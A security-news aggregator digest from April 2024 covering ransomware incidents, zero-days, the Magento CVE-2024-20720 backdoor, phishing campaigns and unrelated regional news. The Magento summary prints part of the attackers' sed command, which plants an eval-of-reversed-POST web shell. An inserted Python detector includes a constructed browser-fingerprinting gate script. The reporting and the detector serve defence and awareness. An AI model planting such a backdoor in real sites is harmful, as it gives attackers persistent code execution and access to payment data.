          2023 CL0P Growth: Emerging in early 2019, CL0P was first introduced as a more advanced version of its predecessor, the ‘CryptoMix’ ransomware, brought about by its owner CL0P ransomware, a cybercrime organisation. Over the years the group remained active with significant campaigns throughout 2020 to 2022. But in 2023 the CL0P ransomware gang took itself to new heights and became one of the "

          Autosummary: CL0P was able to capitalize on vulnerable networks and systems extremely quickly, extracting sensitive data from some of the world's largest organizations (BBC, Ernst Young, PwC, Gen Digital, British Airways, TFL, Siemens, and many more). Those at greater risk, for instance, those in industries specifically targeted by CLOP (Finance, Manufacturing, Healthcare), or those that hold sensitive data, should work with an MSSP to ensure that the best security practices are in place. CL0P operates a Ransomware-as-a-Service model (RaaS), which frequently employs the "steal, encrypt, and leak" tactics common worldwide among many ransomware affiliates. "


          GHC-SCW: Ransomware gang stole health data of 533,000 people

          exploits ransomware
          2024-04-09 https://www.bleepingcomputer.com/news/security/ghc-scw-ransomware-gang-stole-health-data-of-533-000-people/
          Non-profit healthcare service provider Group Health Cooperative of South Central Wisconsin (GHC-SCW) has disclosed that a ransomware gang breached its network in January and stole documents containing the personal and medical information of over 500,000 individuals. [...] "

          Autosummary: Health data stolen during the January ransomware attack includes affected individuals' names, addresses, telephone numbers, e-mail addresses, dates of birth and/or deaths, social security numbers, member numbers, and Medicare and/or Medicaid numbers. "


          Microsoft fixes two Windows zero-days exploited in malware attacks

          exploits
          2024-04-09 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-two-windows-zero-days-exploited-in-malware-attacks/
          Microsoft has fixed two actively exploited zero-day vulnerabilities during the April 2024 Patch Tuesday, although the company failed to initially tag them as such. [...] "

          Autosummary: The first, tracked as CVE-2024-26234 and described as a proxy driver spoofing vulnerability, was issued to track a malicious driver signed using a valid Microsoft Hardware Publisher Certificate that was found by Sophos X-Ops in December 2023 and reported by team lead Christopher Budd. "


          Microsoft patches two actively exploited zero-days (CVE-2024-29988, CVE-2024-26234)

          exploits
          2024-04-09 https://www.helpnetsecurity.com/2024/04/09/april-2024-patch-tuesday-cve-2024-29988/

          On this April 2024 Patch Tuesday, Microsoft has fixed a record 147 CVE-numbered vulnerabilities, including CVE-2024-29988, a vulnerability that Microsoft hasn’t marked as exploited, but Peter Girnus, senior threat researcher with Trend Micro’s Zero Day Initiative (ZDI), has found being leveraged by attackers in the wild. “Threat actors are sending exploits in a zipped file to evade EDR/NDR detection and then using this bug (and others) to bypass MotW,” notes Dustin Childs, head of threat … More

          The post Microsoft patches two actively exploited zero-days (CVE-2024-29988, CVE-2024-26234) appeared first on Help Net Security.

          "

          Autosummary: On this April 2024 Patch Tuesday, Microsoft has fixed a record 147 CVE-numbered vulnerabilities, including CVE-2024-29988, a vulnerability that Microsoft hasn’t marked as exploited, but Peter Girnus, senior threat researcher with Trend Micro’s Zero Day Initiative (ZDI), has found being leveraged by attackers in the wild. "


          HSBC agrees to sell off its Argentina business

          latam
          2024-04-09 https://www.bbc.co.uk/news/world-latin-america-68775630
          The banking giant is set to take a billion-dollar loss by exiting Argentina after nearly 30 years. "

          Autosummary: "


          How can the energy sector bolster its resilience to ransomware attacks?

          exploits ransomware industry
          2024-04-08 https://www.helpnetsecurity.com/2024/04/08/energy-sector-attacks-resilience/

          Since it plays a vital role in every functioning society, the energy sector has always been a prime target for state-backed cybercriminals. The cyber threats targeting this industry have grown significantly in recent years, as geopolitical tensions have fueled an increase in state-sponsored cyber espionage. According to one report on OT/ICS cyber security incidents, the energy sector recorded 39% of all attacks, with nearly 60% of these attacks attributed to state-affiliated groups. As well as … More

          The post How can the energy sector bolster its resilience to ransomware attacks? appeared first on Help Net Security.

          "

          Autosummary: Moreover, energy providers still rely on ageing OT assets like industrial control systems (ICS), supervisory control and data acquisition (SCADA) systems, and programmable logic controllers (PLCs). The critical threat of ransomware: In 2023, we saw an increase in ransomware attacks against the energy industry including nuclear, oil, and gas facilities. "


          WiCyS: A champion for a more diverse cybersecurity workforce

          ciber
          2024-04-08 https://www.helpnetsecurity.com/2024/04/08/wicys-women-in-cybersecurity-workforce/

          In this Help Net Security interview, Lynn Dohm, Executive Director at Women in CyberSecurity (WiCyS), talks about how the organization supports its members across different stages of their cybersecurity journey. WiCyS (pronounced Wee-Sis) is an organization dedicated to advancing the representation and success of women in cybersecurity, as well as fostering a more diverse workforce through various strategic initiatives. In light of existing cybersecurity workforce shortages, the organization’s role is becoming increasingly important. (Lynn Dohm’s … More

          The post WiCyS: A champion for a more diverse cybersecurity workforce appeared first on Help Net Security.

          "

          Autosummary: Our flagship event, the WiCyS Conference, brings together women and allies offering attendees – both in-person and virtual – technical presentations, workshops, panels, lightning talks, networking socials, résumé reviews, mock interviews, professional headshots, a career fair, a capture-the-flag competition, and more. Members have access to hundreds of the resources and opportunities provided by their network, including professional development, career advancement, education, mentorship, and research. Our membership is open to professionals, students, educators, researchers, and allies who support the inclusion and advancement of women in cybersecurity. For veteran members, we provide conference Veteran Fellowship Awards, discounts on membership and conference fees, and opportunities to engage in the WiCyS Veterans’ Apprenticeship program, helping with the transition into cybersecurity. For career advancement, leadership training prepares women for senior roles, while recognition and awards highlight their achievements, inspiring others and contributing to a culture that values and promotes women’s contributions in cybersecurity. "


          How malicious email campaigns continue to slip through the cracks

          ransomware
          2024-04-08 https://www.helpnetsecurity.com/2024/04/08/email-remains-predominant-target-video/

          In this Help Net Security video, Josh Bartolomie, VP of Global Threat Services at Cofense, discusses how email will remain a target as long as it remains the predominant form of communication within a business. Cofense researchers have found that malicious email threats bypassing secure email gateways (SEGs) increased over 100% in the past year. Furthermore, threat actors are enhancing their sophistication, successfully circumventing conventional email security measures. They are adopting novel attack vectors, including … More

          The post How malicious email campaigns continue to slip through the cracks appeared first on Help Net Security.

          "

          Autosummary: "


          Industrial sectors embrace zero trust for enhanced security

          industry
          2024-04-08 https://www.helpnetsecurity.com/2024/04/08/ot-environments-zero-trust-implementation/

          Organizations are leveraging zero trust to enhance the safety, security, and reliability of their enterprise across IT and OT environments, according to Xage Security. Zero trust security implementation in industrial sectors: The report analyzes the current status and trajectory of zero trust security implementation within industrial organizations, specifically focusing on critical infrastructure and manufacturing sectors. The growing and evolving threat landscape has elevated cybersecurity to a top priority for infrastructure operators across the globe. New … More

          The post Industrial sectors embrace zero trust for enhanced security appeared first on Help Net Security.

          "

          Autosummary: “While zero trust is not a one-size-fits-all model, the data shows that organizations are evolving their understanding of zero trust as a strategy to enhance the safety, security, and reliability of both their enterprise IT and OT environments,” said Jonathon Gordon, Industry Analyst at Takepoint Research. "


          Google Sues App Developers Over Fake Crypto Investment App Scam

          financial
          2024-04-08 https://thehackernews.com/2024/04/google-sues-app-developers-over-fake.html
          Google has filed a lawsuit against two app developers for engaging in an "international online consumer investment fraud scheme" that tricked users into downloading bogus Android apps from the Google Play Store and other sources and stealing their funds under the guise of promising higher returns. The individuals in question are Yunfeng Sun (aka Alphonse Sun) and Hongnam Cheung (aka "

          Autosummary: It also accused them of violating the Racketeer Influenced and Corrupt Organizations Act (RICO), carrying out wire fraud, and breaching the Google Play App Signing Terms of Service, Developer Program Policies, YouTube's Community Guidelines, as well as the Google Voice Acceptable Use Policy. "


          Brazil Supreme Court judge opens inquiry into Musk

          latam
          2024-04-08 https://www.bbc.com/news/articles/cv2ygp5pdqlo
          The billionaire owner of social media platform X has defied a court order to block certain accounts. "

          Autosummary: "


          Cybercriminals Targeting Latin America with Sophisticated Phishing Scheme

          financial ciber
          2024-04-08 https://thehackernews.com/2024/04/cybercriminals-targeting-latin-america.html
          A new phishing campaign has set its eyes on the Latin American region to deliver malicious payloads to Windows systems. "The phishing email contained a ZIP file attachment that when extracted reveals an HTML file that leads to a malicious file download posing as an invoice," Trustwave SpiderLabs researcher Karla Agregado said. The email message, the company said, originates from an email "

          Autosummary: The HTML file contains a link ("facturasmex[.]cloud") that displays an error message saying "this account has been suspended," but when visited from an IP address geolocated to Mexico, loads a CAPTCHA verification page that uses Cloudflare Turnstile. "


          Veriato introduces AI-driven predictive behavior analytics platform

          industry
          2024-04-08 https://www.helpnetsecurity.com/2024/04/08/veriato-irm/

          Veriato released their next generation Insider Risk Management (IRM) solution. With organizations of all sizes facing a more complex cybersecurity environment, Veriato IRM delivers flexibility and scalability using the power of GenAI. Veriato’s IRM solution offers technology for companies looking to improve their threat mitigation with AI enabled predictive analytics delivering better detection and predictability. According to IBM, the average cost of a single data breach has reached $4.45 million, a record high. Organizations need … More

          The post Veriato introduces AI-driven predictive behavior analytics platform appeared first on Help Net Security.

          "

          Autosummary: “We are extremely excited to build upon our history as the category creator, and provide a new layer of control, transparency, confidence and perhaps most importantly, proactivity,” added Harz. "


          Watch Out for "Latrodectus" - This Malware Could Be In Your Inbox

          exploits
          2024-04-08 https://thehackernews.com/2024/04/watch-out-for-latrodectus-this-malware.html
          Threat hunters have discovered a new malware called Latrodectus that has been distributed as part of email phishing campaigns since at least late November 2023. "Latrodectus is an up-and-coming downloader with various sandbox evasion functionality," researchers from Proofpoint and Team Cymru said in a joint analysis published last week, adding it's designed to retrieve "

          Autosummary: TA578, known to be active since at least May 2020, has been linked to email-based campaigns delivering Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, Cobalt Strike, and Bumblebee. "


          The Drop in Ransomware Attacks in 2024 and What it Means

          exploits ransomware
          2024-04-08 https://thehackernews.com/2024/04/the-drop-in-ransomware-attacks-in-2024.html
          The ransomware industry surged in 2023 as it saw an alarming 55.5% increase in victims worldwide, reaching a staggering 5,070. But 2024 is starting off showing a very different picture. While the numbers skyrocketed in Q4 2023 with 1,309 cases, in Q1 2024 the ransomware industry was down to 1,048 cases. This is a 22% decrease in ransomware attacks compared to Q4 2023. "

          Autosummary: They released a statement on Tox (in Russian; the article's translation): "The FBI fu$%#d up servers using PHP, backup servers without PHP are not touched." Shortly after, the group continued its global onslaught against organizations, maintaining its position as a dominant force in the realm of ransomware operations. The Impact of the ALPHV Takedown: In a major blow to the ransomware industry, the FBI announced on December 19th, 2023, that they had disrupted the ALPHV/BlackCat ransomware group. "


          Cyberattack on UK’s CVS Group disrupts veterinary operations

          ciber
          2024-04-08 https://www.bleepingcomputer.com/news/security/cyberattack-on-uks-cvs-group-disrupts-veterinary-operations/
          UK veterinary services provider CVS Group has announced that it suffered a cyberattack that disrupted IT services at its practices across the country. [...] "

          Autosummary: CVS Group operates 500 veterinary practices throughout the UK, Australia, the Netherlands, and the Republic of Ireland, including nine specialist referral hospitals, 39 dedicated out-of-hours sites, three laboratories, and seven pet crematoria. "


          Total solar eclipse plunges parts of Mexico into darkness

          latam
          2024-04-08 https://www.bbc.co.uk/news/live/science-environment-68694245
          Stargazers have gathered for the blockbuster event, with a total eclipse set to sweep across Mexico, the US and Canada. "

          Autosummary: "


          Critical RCE bug in 92,000 D-Link NAS devices now exploited in attacks

          exploits
          2024-04-08 https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-92-000-d-link-nas-devices-now-exploited-in-attacks/
          Attackers are now actively targeting over 92,000 end-of-life D-Link Network Attached Storage (NAS) devices exposed online and unpatched against a critical remote code execution (RCE) zero-day flaw. [...] "

          Autosummary: [Figure: Vulnerable D-Link NAS devices exposed online (Netsecfish)] When asked whether security updates would be released to patch this zero-day vulnerability, D-Link also told BleepingComputer that they no longer supported these end-of-life (EOL) NAS devices. "


          Greylock McKinnon Associates data breach exposed DOJ data of 341650 people

          financial
          2024-04-08 https://securityaffairs.com/161592/data-breach/greylock-mckinnon-associates-data-breach.html
          Greylock McKinnon Associates, a service provider for the Department of Justice, suffered a data breach that exposed data of 341650 people. Greylock McKinnon Associates (GMA) provides expert economic analysis and litigation support to a diverse group of domestic and international clients in the legal profession, the business community, and government agencies, including the Department of […] "

          Autosummary: By Pierluigi Paganini, April 08, 2024. "


          Crowdfense is offering a larger 30M USD exploit acquisition program

          exploits
          2024-04-08 https://securityaffairs.com/161584/hacking/crowdfense-30m-exploit-acquisition-program.html
          Zero-day broker firm Crowdfense announced a 30 million USD offer as part of its Exploit Acquisition Program. Crowdfense is a world-leading research hub and acquisition platform focused on high-quality zero-day exploits and advanced vulnerability research. In 2019 the company made the headlines for its 10M USD bug bounty program along with its unique “Vulnerability Research […] "

          Autosummary: Below are the high-demand bug bounties published by the company:
          - SMS/MMS full chain zero-click: 7 to 9 M USD
          - Android zero-click full chain: 5 M USD
          - iOS zero-click full chain: 5 to 7 M USD
          - iOS (RCE + SBX): 3.5 M USD
          - Chrome (RCE + LPE): 2 to 3 M USD
          - Chrome (SBX): 200k USD
          - Chrome (RCE w/o SBX): 200k USD
          - Safari (RCE + LPE): 2.5 to 3.5 M USD
          - Safari (SBX): 300 to 400k USD
          - Safari (RCE w/o SBX): 200k USD
          Pierluigi Paganini (SecurityAffairs). "


          Boom times for US green energy as federal cash flows in

          industry
          2024-04-08 https://www.bbc.co.uk/news/business-68667140
          The US government has directed unprecedented sums of money at green energy projects. "

          Autosummary: "


          60% of small businesses are concerned about cybersecurity threats

          ciber
          2024-04-07 https://www.malwarebytes.com/blog/news/2024/04/60-of-small-businesses-are-concerned-about-cybersecurity-threats
          In a recent US Chamber of Commerce poll, small businesses identified cybersecurity as their biggest concern. "

          Autosummary: On the other hand, small businesses that are least likely to say they are prepared for cyber threats include businesses in the manufacturing sector (61%), female-owned businesses (68%), and businesses in average health (64%).” "


          Home Depot confirms third-party data breach exposed employee info

          financial
          2024-04-07 https://www.bleepingcomputer.com/news/security/home-depot-confirms-third-party-data-breach-exposed-employee-info/
          Home Depot has confirmed that it suffered a data breach after one of its SaaS vendors mistakenly exposed a small sample of limited employee data, which could potentially be used in targeted phishing attacks. [...] "

          Autosummary: "


          Mexico cuts ties with Ecuador after embassy stormed

          latam
          2024-04-06 https://www.bbc.co.uk/news/world-latin-america-68748011
          Police stormed the Mexican embassy in Quito to arrest former Ecuadorian Vice-President Jorge Glas. "

          Autosummary: "


          Hackers Exploit Magento Bug to Steal Payment Data from E-commerce Websites

          exploits
          2024-04-06 https://thehackernews.com/2024/04/hackers-exploit-magento-bug-to-steal.html
          Threat actors have been found exploiting a critical flaw in Magento to inject a persistent backdoor into e-commerce websites. The attack leverages CVE-2024-20720 (CVSS score: 9.1), which has been described by Adobe as a case of "improper neutralization of special elements" that could pave the way for arbitrary code execution. It was addressed by the company as part of "

          Autosummary: "


          HTTP/2 CONTINUATION Flood technique can be exploited in DoS attacks

          exploits ransomware
          2024-04-05 https://securityaffairs.com/161520/security/http-2-continuation-flood-attack.html
          HTTP/2 CONTINUATION Flood: Researchers warn of a new HTTP/2 vulnerability that can be exploited to conduct powerful denial-of-service (DoS) attacks. HTTP messages can contain named fields in both header and trailer sections. CERT/CC experts explained that both header and trailer fields are serialized as field blocks in HTTP/2 to transmit them in multiple fragments to […] "

          Autosummary: CVE-2024-28182 – An implementation using the nghttp2 library will continue to receive CONTINUATION frames, and will not callback to the application to allow visibility into this information before it resets the stream, resulting in a DoS. CVE-2024-27316 – HTTP/2 CONTINUATION frames without the END_HEADERS flag set can be sent in a continuous stream by an attacker to an Apache Httpd implementation, which will not properly terminate the request early. The Go packages net/http and net/http2 do not limit the number of CONTINUATION frames read for an HTTP/2 request, which permits an attacker to provide an arbitrarily large set of headers for a single request, that will be read, decoded, and subsequently discarded, which may result in excessive CPU consumption. "


          Argentina battles dengue surge and repellent shortage

          latam
          2024-04-05 https://www.bbc.co.uk/news/world-latin-america-68738004
          Residents say it is almost impossible to buy repellent as they prepare for their worst dengue season. "

          Autosummary: "


          Cybercriminal adoption of browser fingerprinting

          ciber
          2024-04-05 https://www.helpnetsecurity.com/2024/04/05/browser-fingerprinting/

          Browser fingerprinting is one of many tactics phishing site authors use to evade security checks and lengthen the lifespan of malicious campaigns. While browser fingerprinting has been used by legitimate organizations to uniquely identify web browsers for nearly 15 years, it is now also commonly exploited by cybercriminals: a recent study shows one in four phishing sites using some form of this technique. This article will explain what browser fingerprinting is, provide examples, and discuss … More

          The post Cybercriminal adoption of browser fingerprinting appeared first on Help Net Security.

          "

          Autosummary: Numerous pieces of data can be collected as a part of fingerprinting, including:
          - Time zone
          - Language settings
          - IP address
          - Cookie settings
          - Screen resolution
          - Browser privacy
          - User-agent string
          Browser fingerprinting is used by many legitimate providers to detect bots misusing their services and other suspicious activity, but phishing site authors have also realized its benefits and are using the technique to avoid automated systems that might flag their website as phishing. This fingerprint contains every property of the browser, including information on screen dimensions, operating system, GPU hardware, time zone, and many other data points. "
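Added example, not code from the article or any vendor: a static scorer that maps the data points listed above to the browser APIs that expose them, counts how many of them a page script reads, and reports whether it posts the result somewhere. IP address is not in the table because it is observed server-side (the geofenced phishing page in the Latin America item above is an example of that). The API-to-category map, the four-category threshold and the two sample scripts are this example's assumptions.

```python
import re

# Browser APIs commonly read to build a fingerprint, grouped by the data point
# the article lists. This map and the threshold below are assumptions for the
# example, not a published signature set.
FINGERPRINT_APIS = {
    "user-agent string": [r"navigator\.userAgent", r"navigator\.platform"],
    "language settings": [r"navigator\.languages?\b"],
    "time zone": [r"getTimezoneOffset\s*\(", r"resolvedOptions\(\)\.timeZone"],
    "screen resolution": [r"screen\.(?:width|height|colorDepth)"],
    "cookie settings": [r"navigator\.cookieEnabled"],
    "browser privacy": [r"navigator\.doNotTrack", r"navigator\.webdriver"],
    "GPU hardware": [r"UNMASKED_RENDERER_WEBGL", r"getContext\(\s*['\"]webgl"],
    "hardware": [r"navigator\.hardwareConcurrency", r"navigator\.deviceMemory"],
}
# Ways a script ships the collected profile to a server.
EXFIL = re.compile(r"\b(?:fetch|XMLHttpRequest|sendBeacon)\s*\(")


def fingerprint_signals(script):
    """Map each category to the distinct API references found in script."""
    found = {}
    for category, patterns in FINGERPRINT_APIS.items():
        refs = sorted({m.group(0) for p in patterns for m in re.finditer(p, script)})
        if refs:
            found[category] = refs
    return found


def assess(script, min_categories=4):
    """Return (suspicious, signals, sends_out).

    A legitimate page may touch one or two of these (language for
    localisation, say); reading many of them and posting the result is the
    profile of a fingerprinting gate in front of a phishing page.
    """
    signals = fingerprint_signals(script)
    sends_out = bool(EXFIL.search(script))
    return len(signals) >= min_categories, signals, sends_out


# Constructed sample: a gate that profiles the visitor and lets the server
# decide whether to return the lure or a harmless page.
GATE_SCRIPT = """
const fp = {
  ua: navigator.userAgent,
  lang: navigator.language,
  tz: Intl.DateTimeFormat().resolvedOptions().timeZone,
  res: screen.width + "x" + screen.height,
  cookies: navigator.cookieEnabled,
  dnt: navigator.doNotTrack,
  bot: navigator.webdriver,
  cores: navigator.hardwareConcurrency,
};
const gl = document.createElement("canvas").getContext("webgl");
const info = gl.getExtension("WEBGL_debug_renderer_info");
fp.gpu = gl.getParameter(info.UNMASKED_RENDERER_WEBGL);
fetch("/gate", { method: "POST", body: JSON.stringify(fp) })
  .then(r => r.text()).then(html => { document.body.innerHTML = html; });
"""

# Constructed sample: ordinary page logic that reads one property for localisation.
BENIGN_SCRIPT = """
if (navigator.language.startsWith("de")) { loadTranslations("de"); }
document.querySelector("#login").addEventListener("submit", e => {
  if (!e.target.user.value) { e.preventDefault(); }
});
"""

if __name__ == "__main__":
    for name, src in (("gate", GATE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        suspicious, signals, sends_out = assess(src)
        print(name, suspicious, sends_out, sorted(signals))
```

The scorer is deliberately coarse: it cannot see values collected through obfuscated property access, so treat it as a triage filter over crawled page scripts rather than a verdict, and review anything that scores high together with the page's server behaviour.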


          New Wave of JSOutProx Malware Targeting Financial Firms in APAC and MENA

          financial exploits
          2024-04-05 https://thehackernews.com/2024/04/new-wave-of-jsoutprox-malware-targeting.html
          Financial organizations in the Asia-Pacific (APAC) and Middle East and North Africa (MENA) are being targeted by a new version of an "evolving threat" called JSOutProx. "JSOutProx is a sophisticated attack framework utilizing both JavaScript and .NET," Resecurity said in a technical report published this week. "It employs the .NET (de)serialization feature to interact with a core "

          Autosummary: Such tools could have serious security implications as they open the door to a broad spectrum of crimes like state-sponsored attacks, corporate espionage, dark web market operations, financial fraud, anonymous distribution of malware, and even access to geofenced content. "


          Researchers Identify Multiple China Hacker Groups Exploiting Ivanti Security Flaws

          exploits
          2024-04-05 https://thehackernews.com/2024/04/researchers-identify-multiple-china.html
          Multiple China-nexus threat actors have been linked to the zero-day exploitation of three security flaws impacting Ivanti appliances (CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893). The clusters are being tracked by Mandiant under the monikers UNC5221, UNC5266, UNC5291, UNC5325, UNC5330, and UNC5337. Another group linked to the exploitation spree is UNC3886. The Google Cloud "

          Autosummary: UNC5330, which has been observed combining CVE-2024-21893 and CVE-2024-21887 to breach Ivanti Connect Secure VPN appliances since at least February 2024, has leveraged custom malware such as TONERJAM and PHANTOMNET to facilitate post-compromise actions:
          - PHANTOMNET: a modular backdoor that communicates using a custom protocol over TCP and employs a plugin-based system to download and execute additional payloads.
          - TONERJAM: a launcher designed to decrypt and execute PHANTOMNET.
          Besides using Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate registry entries, and establish persistence, UNC5330 is known to compromise LDAP bind accounts configured on the infected devices in order to gain domain admin access. "


          CISO Perspectives on Complying with Cybersecurity Regulations

          ciber
          2024-04-05 https://thehackernews.com/2024/04/ciso-perspectives-on-complying-with.html
          Compliance requirements are meant to increase cybersecurity transparency and accountability. As cyber threats increase, so do the number of compliance frameworks and the specificity of the security controls, policies, and activities they include. For CISOs and their teams, that means compliance is a time-consuming, high-stakes process that demands strong organizational and "

          Autosummary: "They map across certifications in a single pane of glass, so when an auditor comes in, we show them a screen that says, 'Here's the evidence.'" In addition to tooling, many companies rely on third parties to conduct compliance assessments. How CISOs view cybersecurity compliance can vary greatly, depending on their company size, geography, sector, data sensitivity, and program maturity level. Meeting compliance requirements, on the other hand, could deliver business value, such as faster sales, stronger partnerships, or lower cyber insurance rates. Comply once, apply to many: Most organizations have numerous compliance bodies they must answer to, as well as cyber insurance providers, customers, and partners. "


          From PDFs to Payload: Bogus Adobe Acrobat Reader Installers Distribute Byakugan Malware

          exploits
          2024-04-05 https://thehackernews.com/2024/04/from-pdfs-to-payload-bogus-adobe.html
          Bogus installers for Adobe Acrobat Reader are being used to distribute a new multi-functional malware dubbed Byakugan. The starting point of the attack is a PDF file written in Portuguese that, when opened, shows a blurred image and asks the victim to click on a link to download the Reader application to view the content. According to Fortinet FortiGuard Labs, clicking the URL "

          Autosummary: " This includes setting up persistence, monitoring the victim's desktop using OBS Studio, capturing screenshots, downloading cryptocurrency miners, logging keystrokes, enumerating and uploading files, and grabbing data stored in web browsers. "


          Cyberattack disrupted services at Omni Hotels & Resorts

          ciber
          2024-04-05 https://securityaffairs.com/161504/cyber-crime/omni-hotels-resorts-cyberattack.html
          US hotel chain Omni Hotels & Resorts suffered a cyber attack that forced the company to shut down its systems. A cyberattack hit Omni Hotels & Resorts disrupting its services and forcing the company to shut down its systems. The hotel chain did not share details about the attack, however, the effects reported in the […] "

          Autosummary: As a result, certain systems were brought offline, most of which… — Omni Hotels & Resorts (@OmniHotels) April 4, 2024 The hotel chain did not share details about the attack, however, the effects reported in the notice suggest that the company may have been hit by a ransomware attack. "


          Panera Bread week-long IT outage caused by ransomware attack

          exploits ransomware
          2024-04-05 https://www.bleepingcomputer.com/news/security/panera-bread-week-long-it-outage-caused-by-ransomware-attack/
          Panera Bread's recent week-long outage was caused by a ransomware attack, according to people familiar with the matter and emails seen by BleepingComputer. [...] "

          Autosummary: Panera Bread suffered the massive outage on March 22, impacting its internal IT systems, phones, point of sales system, website, and mobile apps. "


          AI-as-a-Service Providers Vulnerable to PrivEsc and Cross-Tenant Attacks

          Telcos
          2024-04-05 https://thehackernews.com/2024/04/ai-as-service-providers-vulnerable-to.html
          New research has found that artificial intelligence (AI)-as-a-service providers such as Hugging Face are susceptible to two critical risks that could allow threat actors to escalate privileges, gain cross-tenant access to other customers' models, and even take over the continuous integration and continuous deployment (CI/CD) pipelines. "Malicious models represent a major risk to AI systems, "

          Autosummary: "Malicious models represent a major risk to AI systems, especially for AI-as-a-service providers because potential attackers may leverage these models to perform cross-tenant attacks," Wiz researchers Shir Tamari and Sagi Tzadik said. "


          Fake Facebook MidJourney AI page promoted malware to 1.2 million people

          exploits
          2024-04-05 https://www.bleepingcomputer.com/news/security/fake-facebook-midjourney-ai-page-promoted-malware-to-12-million-people/
          Hackers are using Facebook advertisements and hijacked pages to promote fake Artificial Intelligence services, such as MidJourney, OpenAI's SORA and ChatGPT-5, and DALL-E, to infect unsuspecting users with password-stealing malware. [...] "

          Autosummary: [Figure: Fake NFT promotion (Source: Bitdefender)] Because the targeting parameters of Facebook ads can be viewed in the Meta Ad Library, the researchers found that the ads targeted a demographic of men aged 25 to 55 in Europe, primarily Germany, Poland, Italy, France, Belgium, Spain, the Netherlands, Romania, and Sweden. "


          Google sues crypto investment app makers over alleged massive “pig butchering” scam

          financial
          2024-04-05 https://www.bitdefender.com/blog/hotforsecurity/google-sues-crypto-investment-app-makers-over-alleged-massive-pig-butchering-scam/
          Two China-based Android app developers are being sued by Google for an alleged scam targeting 100,000 users worldwide through fake cryptocurrency and other investment apps. Read more in my article on the Hot for Security blog. "

          Autosummary: " Google claims the men used three primary methods to "socially engineer and lure victim investors to download their fraudulent apps from Google Play and other sources": Text messages would be sent via Google Voice to potential victims, disguised as messages sent to a wrong number (for instance, "I am Sophia, do you remember me?"). "


          The Week in Ransomware - April 5th 2024 - Virtual Machines under Attack

          exploits ransomware
          2024-04-05 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-5th-2024-virtual-machines-under-attack/
          Ransomware attacks targeting VMware ESXi and other virtual machine platforms are wreaking havoc among the enterprise, causing widespread disruption and loss of services. [...] "

          Autosummary: Contributors and those who provided new ransomware information and stories this week include: @fwosar, @LawrenceAbrams, @billtoulas, @BleepinComputer, @serghei, @Ionut_Ilascu, @Seifreed, @malwrhunterteam, @demonslay335, @1ZRR4H, @BushidoToken, @pcrisk, @JakubKroustek, @AJVicens, @TrendMicro, @AlexMartin, @jgreigj, @TheDFIRReport, @SonicWall, and @CSIRTGOB. April 2nd 2024: Omni Hotels & Resorts has been experiencing a chain-wide outage that brought down its IT systems on Friday, impacting reservation, hotel room door lock, and point-of-sale (POS) systems. Similarly, Omni Hotels suffered a massive outage, which took down the company's reservation system, phones, and door lock system. "


          Magento flaw exploited to deploy persistent backdoor hidden in XML

          exploits
          2024-04-05 https://securityaffairs.com/161534/hacking/magento-vulnerability-actively-exploited.html
          Threat actors are exploiting critical Magento vulnerability CVE-2024-20720 to install a persistent backdoor on e-stores. Sansec researchers observed threat actors exploiting the recently disclosed Magento vulnerability CVE-2024-20720 to deploy a persistent backdoor on e-stores. The vulnerability CVE-2024-20720 (CVSS score of 9.1) is an OS command injection vulnerability that could lead to arbitrary code […] "

          Autosummary: \"code\" ;\ @ eval ( $catalogQuery ( strrev ( $_POST [\"7faa27b473\"] ) ));\ exit ( 0 ) ;\ }/g" \ ../generated/code/Magento/Cms/Controller/Index/Index/Interceptor.php The described process allows attackers to establish persistent remote code execution via POST commands. "


          Strengthening defenses against nation-state and for-profit cyber attacks

          government
          2024-04-04 https://www.helpnetsecurity.com/2024/04/04/nation-state-for-profit-cyber-attacks-video/

          There is an urgent need to secure tactical, operational, and strategic critical assets from the edge to the core. In this Help Net Security video, Geoffrey Mattson, CEO of Xage Security, discusses the steps enterprises and critical infrastructure operators must take to protect their environments against for-profit and nation-state attacks. To protect critical infrastructure against rising geopolitical tensions, the government must focus on securing credentials and controlling access privileges to the most granular degree possible. They … More

          The post Strengthening defenses against nation-state and for-profit cyber attacks appeared first on Help Net Security.

          "

          Autosummary: "


          Jackson County, Missouri, discloses a ransomware attack

          exploits government ransomware
          2024-04-04 https://securityaffairs.com/161453/cyber-crime/jackson-county-missouri-ransomware.html
          Jackson County, Missouri, confirmed that a ransomware attack has disrupted several county services. A ransomware attack disrupted several services of Jackson County, Missouri. The County Executive Frank White, Jr. declared a state of emergency. “Jackson County has confirmed a ransomware attack was responsible for the disruption of several county services today.” reads the statement […] "

          Autosummary: By Pierluigi Paganini, April 04, 2024. "


          Brazil and Colombia new leaders spur logging drop

          latam
          2024-04-04 https://www.bbc.co.uk/news/science-environment-68716874
          Brazil and Colombia curbed logging in 2023, but other countries wiped out many of the gains. "

          Autosummary: "


          What makes a ransomware attack eight times as costly? Compromised backups

          exploits ransomware
          2024-04-04 https://www.exponential-e.com/blog/what-makes-a-ransomware-attack-eight-times-as-costly
          New research has found that ransomware remediation costs can explode when backups have been compromised by malicious hackers, with overall recovery costs eight times higher than for those whose backups are not impacted. Read more in my article on the Exponential-e blog. "

          Autosummary: "


          Considerations for Operational Technology Cybersecurity

          ciber
          2024-04-04 https://thehackernews.com/2024/04/considerations-for-operational.html
          Operational Technology (OT) refers to the hardware and software used to change, monitor, or control the enterprise's physical devices, processes, and events. Unlike traditional Information Technology (IT) systems, OT systems directly impact the physical world. This unique characteristic of OT brings additional cybersecurity considerations not typically present in conventional IT security "

          Autosummary: Therefore, OT cybersecurity measures that introduce latency, such as multi-factor authentication, just-in-time access request workflows, and session activity monitoring, may not be suitable for OT environments. For example, the OWASP Top 10 addresses web application cybersecurity concerns such as injection, broken authentication, sensitive data exposure, and security misconfigurations, which are common vulnerabilities that can also be found in OT environments. The convergence of IT and OT: Historically, IT and Operational Technology (OT) have operated in separate silos, each with its own set of protocols, standards, and cybersecurity measures. For example, Modbus, a widely used communication protocol in legacy OT systems, does not include authentication or encryption, making it vulnerable to attacks. "


          New HTTP/2 Vulnerability Exposes Web Servers to DoS Attacks

          exploits
          2024-04-04 https://thehackernews.com/2024/04/new-http2-vulnerability-exposes-web.html
